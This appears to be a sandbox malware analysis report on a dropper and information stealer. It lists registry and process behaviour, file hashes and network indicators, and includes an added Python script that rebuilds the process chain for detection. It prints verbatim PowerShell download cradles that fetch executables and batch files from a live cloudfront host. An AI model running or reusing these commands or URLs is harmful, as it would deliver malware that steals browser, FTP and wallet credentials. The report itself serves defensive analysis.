Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A

Detects encrypted or obfuscated .NET executables

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\i1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\u16g.1.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\i1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u16g.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u16g.1.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Command and Scripting Interpreter: PowerShell

execution

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\u16g.0.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u16g.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u16g.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u16g.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u16g.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u16g.0.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u16g.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u16g.0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4392 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 3536 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 3536 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 3536 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 3536 wrote to memory of 4536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.0.exe
PID 1528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.0.exe
PID 1528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.0.exe
PID 1528 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.1.exe
PID 1528 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.1.exe
PID 1528 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.1.exe
PID 3168 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\u16g.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 3168 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\u16g.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe

"C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nss4EAD.tmp\est.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=2838 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\u16g.0.exe

"C:\Users\Admin\AppData\Local\Temp\u16g.0.exe"

C:\Users\Admin\AppData\Local\Temp\u16g.1.exe

"C:\Users\Admin\AppData\Local\Temp\u16g.1.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 840 -ip 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 2344
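
The WriteProcessMemory rows above give the parent/child PIDs and the Processes list gives the command lines, but the report leaves joining them to the reader. The script below is an added example for this report, not part of the sandbox output: it deduplicates the triplicated rows, rebuilds the chain dropper → cmd.exe (NSIS est.bat) → powershell/i1.exe → u16g.*.exe, and flags the three WebClient download cradles, including the one that sets a custom User-Agent. The rows and command lines are constructed from the tables above (sample.exe stands in for the 64-hex-character dropper name), and pairing each PowerShell PID with a command line follows the order the report lists them, which is an assumption.

```python
"""Rebuild the process chain from the sandbox's WriteProcessMemory rows and
flag PowerShell download cradles. Added example, not sandbox output; rows
and command lines are constructed from the report's tables, and the
PID-to-command-line pairing for the PowerShell children is an assumption.
"""
import re
from collections import defaultdict

# The sandbox logs three WriteProcessMemory calls per child (the parent
# writing startup data into the new process); one duplicate is kept to
# show the dedupe. sample.exe stands in for the 64-hex dropper name.
WPM_ROWS = r"""
PID 4392 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\SysWOW64\cmd.exe
PID 3536 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3536 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 3536 wrote to memory of 4536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1528 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.0.exe
PID 1528 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u16g.1.exe
PID 3168 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\u16g.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic.exe
"""

# Constructed from the Processes section (PowerShell PIDs paired by order).
CMDLINES = {
    3536: r'"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nss4EAD.tmp\est.bat"',
    4780: "powershell -Command \"(New-Object Net.WebClient).DownloadFile("
          "'https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')\"",
    4772: "powershell -Command \"(New-Object Net.WebClient).DownloadFile("
          "'https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')\"",
    1528: "i1.exe /SUB=2838 /str=one",
    4536: "powershell -command \"$cli = New-Object System.Net.WebClient;"
          "$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile("
          "'https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')\"",
}

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")
DL_RE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)
UA_RE = re.compile(r"Headers\['User-Agent'\]\s*=\s*'([^']+)'", re.I)
# %TEMP%\ns????.tmp is where an NSIS installer stub unpacks plugins/scripts.
NSIS_BAT_RE = re.compile(r"\\ns[0-9a-z]{4,6}\.tmp\\[^\\]+\.bat", re.I)


def parse_wpm(text):
    """Return {child_pid: (parent_pid, parent_image, child_image)}, deduplicated."""
    edges = {}
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            parent, child, pimg, cimg = m.groups()
            edges.setdefault(int(child), (int(parent), pimg, cimg))
    return edges


def chain_to(edges, pid):
    """Ancestry from the root process down to pid."""
    chain = [pid]
    while chain[-1] in edges:
        chain.append(edges[chain[-1]][0])
    return chain[::-1]


def render_tree(edges, root):
    """Indented process tree as a list of 'pid image' lines."""
    children, images = defaultdict(list), {}
    for child, (parent, pimg, cimg) in edges.items():
        children[parent].append(child)
        images[child] = cimg
        images.setdefault(parent, pimg)
    lines = []

    def walk(pid, depth):
        lines.append("  " * depth + f"{pid} {images[pid].rsplit(chr(92), 1)[-1]}")
        for c in sorted(children[pid]):
            walk(c, depth + 1)

    walk(root, 0)
    return lines


def analyze_cradle(cmdline):
    """Finding dict for a WebClient.DownloadFile cradle, else None."""
    m = DL_RE.search(cmdline)
    if "powershell" not in cmdline.lower() or not m:
        return None
    ua = UA_RE.search(cmdline)
    return {"url": m.group(1), "dest": m.group(2),
            "user_agent": ua.group(1) if ua else None,   # custom UA is a pivot on its own
            "drops_executable": m.group(2).lower().endswith((".exe", ".dll", ".bat"))}


def findings(edges, cmdlines):
    """Cradles enriched with parent PID and whether the parent ran an NSIS batch file."""
    out = []
    for pid, cmd in cmdlines.items():
        f = analyze_cradle(cmd)
        if f:
            parent = edges[pid][0] if pid in edges else None
            f.update(pid=pid, parent=parent,
                     from_nsis_batch=bool(NSIS_BAT_RE.search(cmdlines.get(parent, ""))))
            out.append(f)
    return sorted(out, key=lambda f: f["pid"])


if __name__ == "__main__":
    edges = parse_wpm(WPM_ROWS)
    print("\n".join(render_tree(edges, 4392)))
    for f in findings(edges, CMDLINES):
        print(f)
```

The useful detection signal is the combination, not any single row: cmd.exe running a .bat from an NSIS `ns????.tmp` directory, which then spawns three PowerShell WebClient downloads, one with a hand-set User-Agent, and writes the result to a relative path in the same temp directory. Each piece alone is common in legitimate installers.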

Network

Country Destination Domain Proto
US 8.8.8.8:53 d235izp073r941.cloudfront.net udp
GB 108.156.50.188:443 d235izp073r941.cloudfront.net tcp
US 8.8.8.8:53 188.50.156.108.in-addr.arpa udp
US 8.8.8.8:53 12.178.204.143.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 113.216.138.108.in-addr.arpa udp
US 8.8.8.8:53 d2iv78ooxaijb6.cloudfront.net udp
GB 108.156.32.207:443 d2iv78ooxaijb6.cloudfront.net tcp
US 8.8.8.8:53 207.32.156.108.in-addr.arpa udp
GB 108.156.32.207:443 d2iv78ooxaijb6.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
GB 108.156.32.207:443 d2iv78ooxaijb6.cloudfront.net tcp
US 8.8.8.8:53 240429000936002.mjt.kqri92.top udp
BG 94.156.35.76:80 240429000936002.mjt.kqri92.top tcp
US 8.8.8.8:53 76.35.156.94.in-addr.arpa udp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.50:443 download.iolo.net tcp
US 8.8.8.8:53 50.56.244.143.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 150.155.9.20.in-addr.arpa udp
DE 185.172.128.150:80 185.172.128.150 tcp
US 8.8.8.8:53 150.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nss4EAD.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\nss4EAD.tmp\est.bat

MD5 f32d05160acf8325e9a09f09f80d16f4
SHA1 46e159b71e6ef99076c4002e1fda134e1d0a86c9
SHA256 da8f4f45b105538f0063ece220b69455b15c8e680099c02221c093ecb794ae37
SHA512 147c870edd09fa3f6cd93caae809b5d66fecc759e3cfee4e47dc487786edc760989fdb23310b4284e63871fe1b1d805e949601f54bfc93ff80e2e097a989879b

memory/4780-18-0x000000007343E000-0x000000007343F000-memory.dmp

memory/4780-19-0x00000000029B0000-0x00000000029E6000-memory.dmp

memory/4780-20-0x00000000050F0000-0x0000000005718000-memory.dmp

memory/4780-21-0x0000000073430000-0x0000000073BE0000-memory.dmp

memory/4780-23-0x0000000073430000-0x0000000073BE0000-memory.dmp

memory/4780-22-0x00000000057B0000-0x00000000057D2000-memory.dmp

memory/4780-24-0x0000000005850000-0x00000000058B6000-memory.dmp

memory/4780-25-0x00000000058C0000-0x0000000005926000-memory.dmp

memory/4780-26-0x0000000005930000-0x0000000005C84000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wnlrp5as.1gi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4780-36-0x0000000005F30000-0x0000000005F4E000-memory.dmp

memory/4780-37-0x0000000005F50000-0x0000000005F9C000-memory.dmp

memory/4780-38-0x0000000007570000-0x0000000007BEA000-memory.dmp

memory/4780-39-0x0000000006420000-0x000000000643A000-memory.dmp

memory/4780-42-0x0000000073430000-0x0000000073BE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/4772-44-0x0000000073430000-0x0000000073BE0000-memory.dmp

memory/4772-45-0x0000000073430000-0x0000000073BE0000-memory.dmp

memory/4772-46-0x0000000073430000-0x0000000073BE0000-memory.dmp

memory/4772-56-0x0000000005790000-0x0000000005AE4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 953338c2ec72a2b464d681f6c15982d4
SHA1 f8fec1dafefddc45a5313996f82569ce3e327320
SHA256 ad6b800555dc69497ebdf30dbc9d55d374f58f1cc343bbc0b2488653b5c11805
SHA512 657b444d962143ee0593819ac280f9e6c13559dcd7f6fa8576706b0e11b7be54e2b966aecfbdb263037d7a5eb28552d847359216d76843a3fcb4484dce42983f

memory/4772-60-0x0000000073430000-0x0000000073BE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\i1.exe

MD5 e8fe249ed5e4a60afe3b5e0063b2aa1a
SHA1 10136812a9720946b8b3de256bd80464a7c15745
SHA256 a1aa7034c117960e045a7386df698cfaaab3bfd8b13d02bbee56b1e62e67e46f
SHA512 ff212796d65628d63474fa261f648e1b93a974aa1db70bb1edac039de9ed798f5e50debd823b407b208894ed33e320bab1a7275c5649446ff9f8e8b8bac12973

memory/4536-74-0x00000000062A0000-0x00000000065F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c5f931c9dddc6b71152ef1b1373f7cb8
SHA1 cb54fc83f73926fb4321fcca24ac8c3db5d78f1e
SHA256 14413ea0169cbfd6798f35aed518209f245247c887797ade1fcaa05722d21e9a
SHA512 66636370f480ed15e9744019ae60a7554c250d49335710c5059a0c0aeb573fab2803889b0ffb52837283816a228b1e18d4700506316a2532c9ce815021471799

memory/4536-76-0x0000000006860000-0x00000000068AC000-memory.dmp

memory/1528-80-0x0000000000400000-0x0000000002B1E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u16g.0.exe

MD5 a33065159222d4c22e581ea419285701
SHA1 6297d390c9d8c3b8c3340d8d38d46c1bbf32d354
SHA256 ddf2f47cbc0db66b326be096b46854a6ab59a2504688077bba0bbb42c4470ae2
SHA512 2860dab79524b7db3f0b7771b8d402905a8096653d1c83e49e3827bb7cd739104848b691be16fbd898b81bfd4fcdd827fc4c8f72da6e91d565f02e59f5725f79

C:\Users\Admin\AppData\Local\Temp\u16g.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 0b4625e90d15ca2589c975b4103d93e6
SHA1 cefb2862a6a492c28a1d34ced18691cb4c69e0c0
SHA256 80e2d5d818f00819c6e91a2376d6e5cc71e2836269caa77827d343023bf0356d
SHA512 9e141f864f9fb48ce26204291ecb7f35128ef437cfcce77336aea7c8d890591b4c2ce223bed131ce40484500e137d28e1666c3e2cd74ac2cd7ef437459d3c6b6

memory/1528-127-0x0000000000400000-0x0000000002B1E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 c8381035bb90d56846b4b7243c3c6dca
SHA1 65981e071d75a84958f939f4dec5b2e14ebbcd42
SHA256 1d145bd610cd75a971239c2ae8badb63c63dc3487e7d156e1bb451aca143a1df
SHA512 d467f9fbd324a71b901d842c05f2236e4e82c4ad945b61f582aa5f33a817b07ddfc8799795615ad5aeb0096522f569a7018c478c08733482629f5d99a11a502d

memory/3168-139-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2312-140-0x00000167A0950000-0x00000167A4184000-memory.dmp

memory/2312-141-0x00000167C00C0000-0x00000167C01CA000-memory.dmp

memory/2312-142-0x00000167BFF00000-0x00000167BFF10000-memory.dmp

memory/2312-143-0x00000167BFF20000-0x00000167BFF2C000-memory.dmp

memory/2312-144-0x00000167BFF10000-0x00000167BFF24000-memory.dmp

memory/2312-145-0x00000167BFF80000-0x00000167BFFA4000-memory.dmp

memory/2312-146-0x00000167BFDE0000-0x00000167BFDEA000-memory.dmp

memory/2312-148-0x00000167C0430000-0x00000167C0480000-memory.dmp

memory/2312-147-0x00000167C0310000-0x00000167C03C2000-memory.dmp

memory/2312-149-0x00000167C03E0000-0x00000167C040A000-memory.dmp

memory/2312-150-0x00000167C04B0000-0x00000167C04D2000-memory.dmp

memory/2312-151-0x00000167BFDF0000-0x00000167BFDFA000-memory.dmp

memory/2312-155-0x00000167C04E0000-0x00000167C07E0000-memory.dmp

memory/2312-157-0x00000167C4EF0000-0x00000167C4EF8000-memory.dmp

memory/2312-159-0x00000167C4800000-0x00000167C480E000-memory.dmp

memory/2312-158-0x00000167C4830000-0x00000167C4868000-memory.dmp

memory/2312-160-0x00000167C4820000-0x00000167C4828000-memory.dmp

memory/2312-162-0x00000167C5720000-0x00000167C5782000-memory.dmp

memory/2312-161-0x00000167C59A0000-0x00000167C59AA000-memory.dmp

memory/2312-163-0x00000167C5780000-0x00000167C57A2000-memory.dmp

memory/2312-164-0x00000167C5EE0000-0x00000167C6408000-memory.dmp

memory/2312-167-0x00000167C57A0000-0x00000167C57AC000-memory.dmp

memory/2312-168-0x00000167C5880000-0x00000167C58F6000-memory.dmp

memory/2312-170-0x00000167C57E0000-0x00000167C57FE000-memory.dmp

memory/840-173-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
